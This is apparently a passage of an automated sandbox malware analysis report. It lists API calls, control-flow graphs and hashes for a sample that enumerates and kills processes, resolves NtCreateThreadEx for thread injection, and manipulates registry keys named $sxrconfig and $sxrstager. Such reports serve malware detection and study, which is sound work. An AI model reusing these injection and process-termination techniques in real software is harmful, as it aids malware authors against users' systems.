                                                                                                            • String ID: $sxrstager$SOFTWARE
                                                                                                            • API String ID: 2353213234-1606840681
                                                                                                            • Opcode ID: d6fe065efa0b92b2caeb308442f95c4532e4efd9946b2338f3fdf9202a6ba47c
                                                                                                            • Instruction ID: e2b15fd1bdb0af68db2fceded59578336af26d801dc78018de8527ed98e595ed
                                                                                                            • Opcode Fuzzy Hash: d6fe065efa0b92b2caeb308442f95c4532e4efd9946b2338f3fdf9202a6ba47c
                                                                                                            • Instruction Fuzzy Hash: B401A531B00310BBE7107BF59E4EB6F776D9B44705F00043AF706F62E2DAB89A418658
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 71 401292-4012c0 GetProcessHeap HeapAlloc call 401081 74 4012c2-4012c8 71->74 75 40130c-40131e GetProcessHeap RtlFreeHeap 71->75 76 4012ca-4012cb 74->76 77 40130b 74->77 78 4012cd-4012d6 76->78 77->75 79 401302-401308 78->79 80 4012d8-4012db 78->80 79->78 82 40130a 79->82 80->79 81 4012dd-4012ee OpenProcess 80->81 81->79 83 4012f0-4012fc TerminateProcess CloseHandle 81->83 82->77 83->79
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040129E
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012A5
                                                                                                              • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                              • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                              • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                              • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                              • Part of subcall function 00401081: K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                              • Part of subcall function 00401081: OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                              • Part of subcall function 00401081: K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                              • Part of subcall function 00401081: ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                              • Part of subcall function 00401081: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 004011EB
                                                                                                              • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                              • Part of subcall function 00401081: RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 0040120C
                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012E3
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012F3
                                                                                                            • CloseHandle.KERNEL32(000003E8,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012FC
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040130F
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 00401316
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess$Alloc$CloseEnumFreeOpen$ChangeFindHandleMemoryModulesNotificationProcessesReadTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1088988999-0
                                                                                                            • Opcode ID: 757573c93e28f14fb1ba0b7102d0f3237b6072edb6f5997e5a0090194d86dbfe
                                                                                                            • Instruction ID: ab2b09c8b71ca9c99a709ec0924a6b803fad294693bd42ca56058f473aaebc13
                                                                                                            • Opcode Fuzzy Hash: 757573c93e28f14fb1ba0b7102d0f3237b6072edb6f5997e5a0090194d86dbfe
                                                                                                            • Instruction Fuzzy Hash: B601C071A00301ABEB116BE48F0DB5F77A8EB04712F144136EA05B22E1DBB88D40C768
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 84 4014fc-401502 call 401509 ExitProcess
                                                                                                            APIs
                                                                                                              • Part of subcall function 00401509: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                              • Part of subcall function 00401509: RegDeleteValueW.KERNELBASE(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                              • Part of subcall function 00401509: GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                              • Part of subcall function 00401509: HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                              • Part of subcall function 00401509: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                              • Part of subcall function 00401509: RtlFreeHeap.NTDLL(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                            • ExitProcess.KERNEL32 ref: 00401502
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocDeleteExitFreeOpenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3703222776-0
                                                                                                            • Opcode ID: a5779c28a6b8967d7da92993e240726da911757312e1828e8db22bb694370d56
                                                                                                            • Instruction ID: d57de1a7dd692de033d0a6d08cf0830a53249df09c6425f09644fba4c2c840d6
                                                                                                            • Opcode Fuzzy Hash: a5779c28a6b8967d7da92993e240726da911757312e1828e8db22bb694370d56
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,00000000,000F013F,000003E8,?,00000000), ref: 00401022
                                                                                                            • RegDeleteKeyW.ADVAPI32(000003E8,?), ref: 00401038
                                                                                                            • RegEnumKeyExW.ADVAPI32(000003E8,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00401058
                                                                                                            • RegCloseKey.ADVAPI32(000003E8,?,00000000), ref: 00401065
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,000F013F,00000000,?,00000000), ref: 00401077
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Delete$CloseEnumOpen
                                                                                                            • String ID: SOFTWARE\$sxrconfig
                                                                                                            • API String ID: 3013565938-435319591
                                                                                                            • Opcode ID: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                            • Instruction ID: d544ddb297f42690969b4a203d904ba38e423bc2ba9d9ccdcf6cbbeeb35745ab
                                                                                                            • Opcode Fuzzy Hash: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                            • Instruction Fuzzy Hash: CD011271500288FBD7609B92DE4DEAB7ABCEBC5741F10007AB605F10A0DB745E44DA35
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 93 40131f-40132c GetModuleHandleA 94 40133b-40133d 93->94 95 40132e-40133a GetProcAddress 93->95
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,00401271,000003E8,001FFFFF,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00401593), ref: 00401324
                                                                                                            • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00401334
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                            • API String ID: 1646373207-690569937
                                                                                                            • Opcode ID: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                            • Instruction ID: d003ae9fd3514cd023d1297aa5e823454f89fcb9fe9eff1a1c2077655f61d9ec
                                                                                                            • Opcode Fuzzy Hash: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                            • Instruction Fuzzy Hash: 63C09270B423009AEE102B715F0DF0B3A686A40B42B1448B3B609F05E4DAFCC484D52C
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:8%
                                                                                                            Total number of Nodes:490
                                                                                                            Total number of Limit Nodes:8
                                                                                                            execution_graph 15793 1acea2da608 15794 1acea2da621 15793->15794 15795 1acea2da61d 15793->15795 15805 1acea2dccd8 15794->15805 15800 1acea2da633 15802 1acea2db978 __free_lconv_num 4 API calls 15800->15802 15802->15795 15806 1acea2dcce5 15805->15806 15810 1acea2da626 15805->15810 15847 1acea2db39c 15806->15847 15811 1acea2dd1d0 GetEnvironmentStringsW 15810->15811 15812 1acea2dd2a2 15811->15812 15813 1acea2dd1fe 15811->15813 15814 1acea2dd2aa FreeEnvironmentStringsW 15812->15814 15815 1acea2da62b 15812->15815 15816 1acea2dd120 WideCharToMultiByte 15813->15816 15814->15815 15815->15800 15825 1acea2da674 15815->15825 15817 1acea2dd250 15816->15817 15817->15812 15818 1acea2dd257 15817->15818 15819 1acea2daeac 5 API calls 15818->15819 15820 1acea2dd25f 15819->15820 15821 1acea2dd120 WideCharToMultiByte 15820->15821 15822 1acea2dd289 15820->15822 15821->15822 15823 1acea2db978 __free_lconv_num 4 API calls 15822->15823 15824 1acea2dd2a0 15823->15824 15824->15812 15826 1acea2da69b 15825->15826 15827 1acea2db900 _set_errno_from_matherr 4 API calls 15826->15827 15835 1acea2da6d0 15827->15835 15828 1acea2db978 __free_lconv_num 4 API calls 15829 1acea2da640 15828->15829 15842 1acea2db978 15829->15842 15830 1acea2db900 _set_errno_from_matherr 4 API calls 15830->15835 15831 1acea2da730 16279 1acea2da77c 15831->16279 15835->15830 15835->15831 15836 1acea2da767 15835->15836 15838 1acea2db978 __free_lconv_num 4 API calls 15835->15838 15839 1acea2da73f 15835->15839 16270 1acea2dabd4 15835->16270 15840 1acea2db7e0 _invalid_parameter_noinfo 2 API calls 15836->15840 15837 1acea2db978 __free_lconv_num 4 API calls 15837->15839 15838->15835 15839->15828 15841 1acea2da779 15840->15841 15843 1acea2db97d HeapFree 15842->15843 15845 1acea2db9af 15842->15845 15844 1acea2db998 15843->15844 15843->15845 15846 1acea2db8e0 _set_errno_from_matherr 3 API calls 15844->15846 15845->15800 15846->15845 15849 1acea2db3ad 15847->15849 15851 1acea2db3ba 15849->15851 15888 1acea2dd6a8 15849->15888 15850 1acea2db3d1 15850->15851 15891 1acea2db900 15850->15891 15858 1acea2db434 15851->15858 15901 1acea2dac34 15851->15901 15856 1acea2db402 15859 1acea2dd6a8 _set_errno_from_matherr 2 API calls 15856->15859 15857 1acea2db3f2 15860 1acea2dd6a8 _set_errno_from_matherr 2 API calls 15857->15860 15870 1acea2dca60 15858->15870 15861 1acea2db40a 15859->15861 15862 1acea2db3f9 15860->15862 15863 1acea2db420 15861->15863 15864 1acea2db40e 15861->15864 15867 1acea2db978 __free_lconv_num 4 API calls 15862->15867 15897 1acea2db034 15863->15897 15865 1acea2dd6a8 _set_errno_from_matherr 2 API calls 15864->15865 15865->15862 15867->15851 15869 1acea2db978 __free_lconv_num 4 API calls 15869->15851 16136 1acea2dcc20 15870->16136 15872 1acea2dca89 16147 1acea2dc76c 15872->16147 15875 1acea2dcaa3 15875->15810 15878 1acea2db978 __free_lconv_num 4 API calls 15878->15875 15880 1acea2dcb43 15881 1acea2dcb4a 15880->15881 15883 1acea2dcb6f 15880->15883 15882 1acea2db8e0 _set_errno_from_matherr 4 API calls 15881->15882 15887 1acea2dcb4f 15882->15887 15884 1acea2dcbac 15883->15884 15885 1acea2db978 __free_lconv_num 4 API calls 15883->15885 15884->15887 16169 1acea2dc5b0 15884->16169 15885->15884 15887->15878 15907 1acea2dd36c 15888->15907 15890 1acea2dd6d6 __vcrt_FlsSetValue 15890->15850 15896 1acea2db911 _set_errno_from_matherr 15891->15896 15892 1acea2db962 15913 1acea2db8e0 15892->15913 15893 1acea2db946 HeapAlloc 15894 1acea2db3e4 15893->15894 15893->15896 15894->15856 15894->15857 15896->15892 15896->15893 15898 1acea2db0e6 _set_errno_from_matherr 15897->15898 15936 1acea2daf8c 15898->15936 15900 1acea2db0fb 15900->15869 15902 1acea2dac3d 15901->15902 15905 1acea2dac4c _handle_error 15902->15905 16056 1acea2ddcf8 15902->16056 15904 1acea2dac7f 15905->15904 16072 1acea2db5ac 15905->16072 15908 1acea2dd3cd 15907->15908 15911 1acea2dd3c8 try_get_function 15907->15911 15908->15890 15909 1acea2dd4b0 15909->15908 15910 1acea2dd4be GetProcAddress 15909->15910 15910->15908 15911->15908 15911->15909 15912 1acea2dd495 FreeLibrary 15911->15912 15912->15911 15916 1acea2db444 15913->15916 15915 1acea2db8e9 15915->15894 15918 1acea2db459 try_get_function 15916->15918 15917 1acea2dd6a8 _set_errno_from_matherr 2 API calls 15919 1acea2db48e 15917->15919 15918->15917 15920 1acea2db473 _set_errno_from_matherr 15918->15920 15919->15920 15921 1acea2db900 _set_errno_from_matherr 4 API calls 15919->15921 15920->15915 15922 1acea2db4a1 15921->15922 15923 1acea2db4bf 15922->15923 15924 1acea2db4af 15922->15924 15925 1acea2dd6a8 _set_errno_from_matherr 2 API calls 15923->15925 15926 1acea2dd6a8 _set_errno_from_matherr 2 API calls 15924->15926 15927 1acea2db4c7 15925->15927 15928 1acea2db4b6 15926->15928 15929 1acea2db4cb 15927->15929 15930 1acea2db4dd 15927->15930 15933 1acea2db978 __free_lconv_num 4 API calls 15928->15933 15931 1acea2dd6a8 _set_errno_from_matherr 2 API calls 15929->15931 15932 1acea2db034 _set_errno_from_matherr 4 API calls 15930->15932 15931->15928 15934 1acea2db4e5 15932->15934 15933->15920 15935 1acea2db978 __free_lconv_num 4 API calls 15934->15935 15935->15920 15937 1acea2dafa8 15936->15937 15940 1acea2db21c 15937->15940 15939 1acea2dafbe 15939->15900 15941 1acea2db264 Concurrency::details::SchedulerProxy::DeleteThis 15940->15941 15942 1acea2db238 Concurrency::details::SchedulerProxy::DeleteThis 15940->15942 15941->15939 15942->15941 15944 1acea2de784 15942->15944 15945 1acea2de820 15944->15945 15951 1acea2de7a7 15944->15951 15946 1acea2de873 15945->15946 15948 1acea2db978 __free_lconv_num 4 API calls 15945->15948 16010 1acea2de924 15946->16010 15949 1acea2de844 15948->15949 15952 1acea2db978 __free_lconv_num 4 API calls 15949->15952 15950 1acea2de7e6 15953 1acea2de808 15950->15953 15959 1acea2db978 __free_lconv_num 4 API calls 15950->15959 15951->15945 15951->15950 15954 1acea2db978 __free_lconv_num 4 API calls 15951->15954 15955 1acea2de858 15952->15955 15956 1acea2db978 __free_lconv_num 4 API calls 15953->15956 15957 1acea2de7da 15954->15957 15958 1acea2db978 __free_lconv_num 4 API calls 15955->15958 15961 1acea2de814 15956->15961 15970 1acea2e0f38 15957->15970 15964 1acea2de867 15958->15964 15965 1acea2de7fc 15959->15965 15960 1acea2de8de 15966 1acea2db978 __free_lconv_num 4 API calls 15961->15966 15962 1acea2de87f 15962->15960 15967 1acea2db978 HeapAlloc HeapFree FreeLibrary GetProcAddress __free_lconv_num 15962->15967 15968 1acea2db978 __free_lconv_num 4 API calls 15964->15968 15998 1acea2e1044 15965->15998 15966->15945 15967->15962 15968->15946 15971 1acea2e103c 15970->15971 15972 1acea2e0f41 15970->15972 15971->15950 15973 1acea2e0f5b 15972->15973 15974 1acea2db978 __free_lconv_num 4 API calls 15972->15974 15975 1acea2e0f6d 15973->15975 15976 1acea2db978 __free_lconv_num 4 API calls 15973->15976 15974->15973 15977 1acea2e0f7f 15975->15977 15978 1acea2db978 __free_lconv_num 4 API calls 15975->15978 15976->15975 15979 1acea2e0f91 15977->15979 15980 1acea2db978 __free_lconv_num 4 API calls 15977->15980 15978->15977 15981 1acea2e0fa3 15979->15981 15983 1acea2db978 __free_lconv_num 4 API calls 15979->15983 15980->15979 15982 1acea2e0fb5 15981->15982 15984 1acea2db978 __free_lconv_num 4 API calls 15981->15984 15985 1acea2e0fc7 15982->15985 15986 1acea2db978 __free_lconv_num 4 API calls 15982->15986 15983->15981 15984->15982 15987 1acea2e0fd9 15985->15987 15988 1acea2db978 __free_lconv_num 4 API calls 15985->15988 15986->15985 15989 1acea2e0feb 15987->15989 15990 1acea2db978 __free_lconv_num 4 API calls 15987->15990 15988->15987 15991 1acea2e0ffd 15989->15991 15992 1acea2db978 __free_lconv_num 4 API calls 15989->15992 15990->15989 15993 1acea2e1012 15991->15993 15994 1acea2db978 __free_lconv_num 4 API calls 15991->15994 15992->15991 15995 1acea2e1027 15993->15995 15996 1acea2db978 __free_lconv_num 4 API calls 15993->15996 15994->15993 15995->15971 15997 1acea2db978 __free_lconv_num 4 API calls 15995->15997 15996->15995 15997->15971 15999 1acea2e1049 15998->15999 16008 1acea2e10aa 15998->16008 16000 1acea2e1062 15999->16000 16001 1acea2db978 __free_lconv_num 4 API calls 15999->16001 16002 1acea2db978 __free_lconv_num 4 API calls 16000->16002 16003 1acea2e1074 16000->16003 16001->16000 16002->16003 16004 1acea2db978 __free_lconv_num 4 API calls 16003->16004 16006 1acea2e1086 16003->16006 16004->16006 16005 1acea2e1098 16005->16008 16009 1acea2db978 __free_lconv_num 4 API calls 16005->16009 16006->16005 16007 1acea2db978 __free_lconv_num 4 API calls 16006->16007 16007->16005 16008->15953 16009->16008 16011 1acea2de954 16010->16011 16012 1acea2de929 16010->16012 16011->15962 16012->16011 16016 1acea2e1108 16012->16016 16015 1acea2db978 __free_lconv_num 4 API calls 16015->16011 16017 1acea2e1111 16016->16017 16018 1acea2de94c 16016->16018 16052 1acea2e10b0 16017->16052 16018->16015 16021 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16022 1acea2e113a 16021->16022 16023 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16022->16023 16024 1acea2e1148 16023->16024 16025 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16024->16025 16026 1acea2e1156 16025->16026 16027 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16026->16027 16028 1acea2e1165 16027->16028 16029 1acea2db978 __free_lconv_num 4 API calls 16028->16029 16030 1acea2e1171 16029->16030 16031 1acea2db978 __free_lconv_num 4 API calls 16030->16031 16032 1acea2e117d 16031->16032 16033 1acea2db978 __free_lconv_num 4 API calls 16032->16033 16034 1acea2e1189 16033->16034 16035 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16034->16035 16036 1acea2e1197 16035->16036 16037 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16036->16037 16038 1acea2e11a5 16037->16038 16039 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16038->16039 16040 1acea2e11b3 16039->16040 16041 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16040->16041 16042 1acea2e11c1 16041->16042 16043 1acea2e10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16042->16043 16044 1acea2e11d0 16043->16044 16045 1acea2db978 __free_lconv_num 4 API calls 16044->16045 16046 1acea2e11dc 16045->16046 16047 1acea2db978 __free_lconv_num 4 API calls 16046->16047 16048 1acea2e11e8 16047->16048 16049 1acea2db978 __free_lconv_num 4 API calls 16048->16049 16050 1acea2e11f4 16049->16050 16051 1acea2db978 __free_lconv_num 4 API calls 16050->16051 16051->16018 16053 1acea2e10f8 16052->16053 16054 1acea2e10e4 16052->16054 16053->16021 16054->16053 16055 1acea2db978 __free_lconv_num 4 API calls 16054->16055 16055->16054 16057 1acea2ddd20 16056->16057 16063 1acea2ddd41 16056->16063 16058 1acea2db444 _set_errno_from_matherr 4 API calls 16057->16058 16060 1acea2ddd34 16057->16060 16057->16063 16058->16060 16059 1acea2ddd7e 16059->15905 16060->16059 16061 1acea2dddbe 16060->16061 16060->16063 16062 1acea2db8e0 _set_errno_from_matherr 4 API calls 16061->16062 16064 1acea2dddc3 16062->16064 16066 1acea2ddf49 16063->16066 16070 1acea2dde87 16063->16070 16079 1acea2db2c8 16063->16079 16076 1acea2db7c0 16064->16076 16068 1acea2dde77 16069 1acea2db2c8 6 API calls 16068->16069 16069->16070 16071 1acea2db2c8 6 API calls 16070->16071 16071->16070 16073 1acea2db5e6 _invalid_parameter_noinfo capture_current_context 16072->16073 16074 1acea2db67e IsDebuggerPresent 16073->16074 16075 1acea2db6c1 _invalid_parameter_noinfo _handle_error 16074->16075 16075->15904 16123 1acea2db710 16076->16123 16078 1acea2db7d9 16078->16059 16080 1acea2db2dd try_get_function 16079->16080 16081 1acea2dd6a8 _set_errno_from_matherr 2 API calls 16080->16081 16087 1acea2db2f7 _set_errno_from_matherr 16080->16087 16082 1acea2db312 16081->16082 16083 1acea2db900 _set_errno_from_matherr 4 API calls 16082->16083 16082->16087 16084 1acea2db325 16083->16084 16085 1acea2db343 16084->16085 16086 1acea2db333 16084->16086 16090 1acea2dd6a8 _set_errno_from_matherr 2 API calls 16085->16090 16088 1acea2dd6a8 _set_errno_from_matherr 2 API calls 16086->16088 16089 1acea2db386 16087->16089 16092 1acea2dac34 6 API calls 16087->16092 16091 1acea2db33a 16088->16091 16089->16068 16093 1acea2db34b 16090->16093 16097 1acea2db978 __free_lconv_num 4 API calls 16091->16097 16102 1acea2db39b 16092->16102 16094 1acea2db361 16093->16094 16095 1acea2db34f 16093->16095 16096 1acea2db034 _set_errno_from_matherr 4 API calls 16094->16096 16098 1acea2dd6a8 _set_errno_from_matherr 2 API calls 16095->16098 16099 1acea2db369 16096->16099 16097->16087 16098->16091 16100 1acea2db978 __free_lconv_num 4 API calls 16099->16100 16100->16087 16101 1acea2dd6a8 _set_errno_from_matherr 2 API calls 16103 1acea2db3d1 16101->16103 16102->16101 16104 1acea2db3ba 16102->16104 16103->16104 16105 1acea2db900 _set_errno_from_matherr 4 API calls 16103->16105 16106 1acea2dac34 6 API calls 16104->16106 16111 1acea2db434 16104->16111 16107 1acea2db3e4 16105->16107 16108 1acea2db442 16106->16108 16109 1acea2db402 16107->16109 16110 1acea2db3f2 16107->16110 16112 1acea2dd6a8 _set_errno_from_matherr 2 API calls 16109->16112 16113 1acea2dd6a8 _set_errno_from_matherr 2 API calls 16110->16113 16111->16068 16114 1acea2db40a 16112->16114 16115 1acea2db3f9 16113->16115 16116 1acea2db420 16114->16116 16117 1acea2db40e 16114->16117 16120 1acea2db978 __free_lconv_num 4 API calls 16115->16120 16119 1acea2db034 _set_errno_from_matherr 4 API calls 16116->16119 16118 1acea2dd6a8 _set_errno_from_matherr 2 API calls 16117->16118 16118->16115 16121 1acea2db428 16119->16121 16120->16104 16122 1acea2db978 __free_lconv_num 4 API calls 16121->16122 16122->16104 16124 1acea2db444 _set_errno_from_matherr 4 API calls 16123->16124 16125 1acea2db735 16124->16125 16128 1acea2db746 16125->16128 16131 1acea2db7e0 16125->16131 16128->16078 16132 1acea2db7ef _handle_error 16131->16132 16133 1acea2db5ac _invalid_parameter_noinfo IsDebuggerPresent 16132->16133 16134 1acea2db80e _invalid_parameter_noinfo 16133->16134 16135 1acea2db814 TerminateProcess 16134->16135 16141 1acea2dcc43 16136->16141 16137 1acea2dccbf 16137->15872 16138 1acea2dac34 6 API calls 16140 1acea2dccd7 16138->16140 16139 1acea2dcc4d 16139->16137 16139->16138 16143 1acea2db39c 6 API calls 16140->16143 16146 1acea2dcd2a 16140->16146 16141->16139 16142 1acea2db978 __free_lconv_num 4 API calls 16141->16142 16142->16139 16144 1acea2dcd14 16143->16144 16145 1acea2dca60 15 API calls 16144->16145 16145->16146 16146->15872 16181 1acea2dac8c 16147->16181 16150 1acea2dc78c GetOEMCP 16152 1acea2dc7b3 16150->16152 16151 1acea2dc79e 16151->16152 16153 1acea2dc7a3 GetACP 16151->16153 16152->15875 16154 1acea2daeac 16152->16154 16153->16152 16155 1acea2daef7 16154->16155 16159 1acea2daebb _set_errno_from_matherr 16154->16159 16156 1acea2db8e0 _set_errno_from_matherr 4 API calls 16155->16156 16158 1acea2daef5 16156->16158 16157 1acea2daede HeapAlloc 16157->16158 16157->16159 16158->15887 16160 1acea2dcd54 16158->16160 16159->16155 16159->16157 16161 1acea2dc76c 8 API calls 16160->16161 16162 1acea2dcd7f 16161->16162 16163 1acea2dcdbc IsValidCodePage 16162->16163 16166 1acea2dcdff _invalid_parameter_noinfo _handle_error 16162->16166 16164 1acea2dcdcd 16163->16164 16163->16166 16165 1acea2dce04 GetCPInfo 16164->16165 16168 1acea2dcdd6 _invalid_parameter_noinfo 16164->16168 16165->16166 16165->16168 16166->15880 16212 1acea2dc87c 16168->16212 16171 1acea2dc5cc _invalid_parameter_noinfo 16169->16171 16170 1acea2db8e0 _set_errno_from_matherr 4 API calls 16172 1acea2dc65e 16170->16172 16171->16170 16174 1acea2dc5ef _invalid_parameter_noinfo 16171->16174 16173 1acea2db7c0 _invalid_parameter_noinfo 6 API calls 16172->16173 16173->16174 16175 1acea2db8e0 _set_errno_from_matherr 4 API calls 16174->16175 16178 1acea2dc697 16174->16178 16176 1acea2dc6f5 16175->16176 16177 1acea2db7c0 _invalid_parameter_noinfo 6 API calls 16176->16177 16177->16178 16179 1acea2dc731 16178->16179 16180 1acea2db978 __free_lconv_num 4 API calls 16178->16180 16179->15887 16180->16179 16182 1acea2dacb0 16181->16182 16183 1acea2dacab 16181->16183 16182->16183 16184 1acea2db2c8 6 API calls 16182->16184 16183->16150 16183->16151 16185 1acea2daccb 16184->16185 16189 1acea2de584 16185->16189 16190 1acea2de599 16189->16190 16191 1acea2dacee 16189->16191 16190->16191 16197 1acea2dea2c 16190->16197 16193 1acea2de5b8 16191->16193 16194 1acea2de5e0 16193->16194 16195 1acea2de5cd 16193->16195 16194->16183 16195->16194 16209 1acea2dcd38 16195->16209 16198 1acea2db2c8 6 API calls 16197->16198 16200 1acea2dea3b 16198->16200 16199 1acea2dea86 16199->16191 16200->16199 16205 1acea2dea9c 16200->16205 16202 1acea2dea74 16202->16199 16203 1acea2dac34 6 API calls 16202->16203 16204 1acea2dea99 16203->16204 16206 1acea2deaae Concurrency::details::SchedulerProxy::DeleteThis 16205->16206 16208 1acea2deabb 16205->16208 16207 1acea2de784 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16206->16207 16206->16208 16207->16208 16208->16202 16210 1acea2db2c8 6 API calls 16209->16210 16211 1acea2dcd41 16210->16211 16213 1acea2dc8b9 GetCPInfo 16212->16213 16220 1acea2dc9af _handle_error 16212->16220 16214 1acea2dc8cc 16213->16214 16213->16220 16221 1acea2df494 16214->16221 16216 1acea2dc943 16230 1acea2df93c 16216->16230 16219 1acea2df93c 9 API calls 16219->16220 16220->16166 16222 1acea2dac8c 6 API calls 16221->16222 16223 1acea2df4d6 16222->16223 16224 1acea2df513 _handle_error 16223->16224 16225 1acea2daeac 5 API calls 16223->16225 16226 1acea2df538 _invalid_parameter_noinfo 16223->16226 16224->16216 16225->16226 16227 1acea2df5d0 16226->16227 16229 1acea2df5b6 GetStringTypeW 16226->16229 16227->16224 16228 1acea2db978 __free_lconv_num 4 API calls 16227->16228 16228->16224 16229->16227 16231 1acea2dac8c 6 API calls 16230->16231 16232 1acea2df961 16231->16232 16235 1acea2df624 16232->16235 16234 1acea2dc976 16234->16219 16237 1acea2df666 16235->16237 16236 1acea2df8ef _handle_error 16236->16234 16237->16236 16238 1acea2daeac 5 API calls 16237->16238 16239 1acea2df6e3 16237->16239 16238->16239 16240 1acea2df7e7 16239->16240 16257 1acea2dd760 16239->16257 16240->16236 16242 1acea2db978 __free_lconv_num 4 API calls 16240->16242 16242->16236 16243 1acea2df78f 16243->16240 16244 1acea2df7f6 16243->16244 16245 1acea2df7a4 16243->16245 16246 1acea2daeac 5 API calls 16244->16246 16249 1acea2df810 16244->16249 16245->16240 16247 1acea2dd760 3 API calls 16245->16247 16246->16249 16247->16240 16248 1acea2dd760 3 API calls 16251 1acea2df891 16248->16251 16249->16240 